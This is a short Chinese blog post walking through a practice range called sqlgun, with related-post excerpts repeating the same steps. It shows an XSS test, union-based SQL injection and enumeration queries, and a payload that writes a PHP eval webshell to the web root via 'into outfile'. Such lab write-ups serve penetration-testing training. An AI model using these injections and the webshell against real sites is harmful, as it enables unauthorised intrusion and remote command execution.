sqlgun靶场漏洞挖掘

于 2024-09-13 22:40:39 发布
阅读量156 收藏
点赞数 9
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/142230951
版权

进入首页首先看到一个搜索框,那么我们试一下xss

用script弹了个一

接下来我们尝试一下sql注入

这里我们使用联合查询查到了他的数据库名,那么这里也就存在SQL注入了

这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell

首先我们扫描目录,找到phpinfo页面

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #

然后去访问

进行连接

成功getshell

嘤嘤奶嘴酱
关注
sqlgun新闻发布系统.7z
03-21
SQLGun新闻发布的系统概述】 SQLGun新闻发布系统是一款基于数据库技术构建的开源新闻发布软件,它主要功能是帮助企业或个人快速建立一个稳定、高效且易于管理的新闻发布平台。该系统的核心特性在于其强大的内容...
WMS与库存管理的比较
12-15
在IT行业中,仓库管理系统(Warehouse Management System,简称WMS)和库存管理是两个重要的概念,它们在企业物流和供应链管理中扮演着至关重要的角色。本文将深入探讨WMS与库存管理的区别、联系以及各自的优势,...
CISP-PTE CMS sqlgun靶场训练
sudamasami的博客
08-14 136
SQLGUNCMS 靶场训练
sqlgun靶场练习
kknifek的博客
09-13 227
1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞 2.有xss大概率也存在sql注入,测试到3的时候发现有回显 3.进一步得出库名 4.要get shell的话我们可以尝试写一句话木马进去,构建payload key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile ‘/var/www/html/1.php’# 5.访问我们写进去的1.php,确认木马已写入
sqlgun靶场攻略
2301_82061181的博客
09-13 272
步骤七:扫描目录,有一个phpinfo.php文件,访问获取绝对路径。步骤八:.写入一句话木马,访问a.php。步骤六:查看账户和密码。步骤三:查看数据库名。步骤九:进行蚁剑连接。
sqlgun靶场训练
2301_78031880的博客
09-13 158
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #-1' union select 1,group_concat(id,admin,pas
sqlgun靶场通关攻略
2301_80402555的博客
09-13 315
输入 -1' union select 1,2,3# ,页面出现回显点。
CISP-PTE CMS sqlgun靶场渗透测试
最新发布
2401_82451607的博客
09-13 97
CISP-PTE CMS sqlgun靶场渗透测试
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 402
输入 -1' union select 1,2,3# 有回显可以查看数据库sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
CISP-PTE CMS 文章管理系统靶场练习
sudamasami的博客
08-15 283
点击后台管理 发现要登录账号密码 抓包 然后用burp跑一下弱口令 找到了两个账号admin/Admin 密码都是123456。登录账号成功后 点击留言管理 果然有xss窗口弹出 xss漏洞可以借助xss平台获取到管理员cookie。然后用order by 进行猜数 猜到order by 15的时候回显是正常的 说明列数为15。使用xss语句 发现成功弹出 这里存在一个xss漏洞 但是在这个地方的xss漏洞好像没什么用。这里存在xss漏洞那么这个留言板肯定也存在xss漏洞了 于是在留言版测试一下。
JA-awd-sqlgunnews新闻管理系统
静水流深,沧笙踏歌
05-17 2922
1.打开主页 搜索框看一波,输入美国 发现了什么不得了的东西,居然输出了后台的某个查询逻辑,于是看看搜索框能不能也这样绕过,爆库爆表爆字段,得到后台登陆账户密码 解密得密码为adminSql注入修复建议:pdo预处理 2.继续看看没发现什么东西,看了一下自己的源码,发现后台登陆页面 admin admin登陆(其实这里也有sql注入漏洞,万能密码就登陆上了。。。)发现一个任意文件下载漏洞 ...
基于PHP的sqlgun php新闻发布系统.zip
07-23
SQLGun可能是这个系统的名称,暗示它可能在数据库操作方面具有高效和灵活的特点。 【描述】"基于PHP的sqlgun php新闻发布系统.zip"描述简洁,主要强调了其基于PHP技术,并且是一个新闻发布的解决方案。这表明系统的...
PHP实例开发源码—sqlgun php新闻发布系统.zip
11-23
SQLgun新闻系统可能采用了这种架构,其中模型处理数据逻辑,视图负责展示,控制器协调二者。理解MVC可以帮助开发者更好地组织代码和分离关注点。 4. **新闻管理功能**:系统可能包括新闻的添加、编辑、删除、分类...
spring事务详细讲解-深入浅出
小电玩
09-08 492
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
【提效工具】AI工作流的1-10个实际落地场景
万物皆有灵
09-09 1121
在这个快速发展的数字时代,人工智能(AI)正在以惊人的速度改变我们的工作方式。无论你是开发者、教育工作者还是内容创作者,AI工作流提示词助手都能为你提供无与伦比的支持。今天,我们将深入探讨,20个实际落地场景,帮助你更好地理解如何利用这些工具提升工作效率和创造力。💡。
jmeter之setUP、tearDown线程组
回家吃月饼的学习交流地
09-07 588
jmeter之setUP、tearDown线程组的使用
问题: java.sql.SQLException:The server time zone value ‘�й���׼ʱ��‘
m0_74293254的博客
09-08 335
译文: Mybatis Plus服务器时区值“h”无法识别或表示多个时区。如果希望利用时区支持,必须配置服务器或JDBC驱动程序(通过serverTimezone配置属性)以使用更具体的时区值。出现上述问题后,一般为数据库连接的url地址配置中,没有配置时区serverTimezone=UTC或配置错误,修改下即可。
基于SpringBoot的旅游管理系统
heye0910032的博客
09-08 470
随着科技的发展,旅游管理系统的信息化成为提升旅游服务效率的关键。本系统采用JSP技术和SpringBoot框架,结合MySQL数据库,旨在实现一个功能全面、操作简便、安全可靠的旅游管理平台。系统通过需求分析、系统设计、功能实现和测试,确保了良好的用户体验和数据处理能力,为旅游业务的现代化管理提供了强有力的技术支持。本研究成功开发了一个基于SpringBoot的旅游管理系统,该系统通过集成多种旅游管理功能,显著提高了旅游服务的效率和质量。系统的用户友好界面和强大的后端功能,使得管理员和用户都能从中受益。
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 580
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值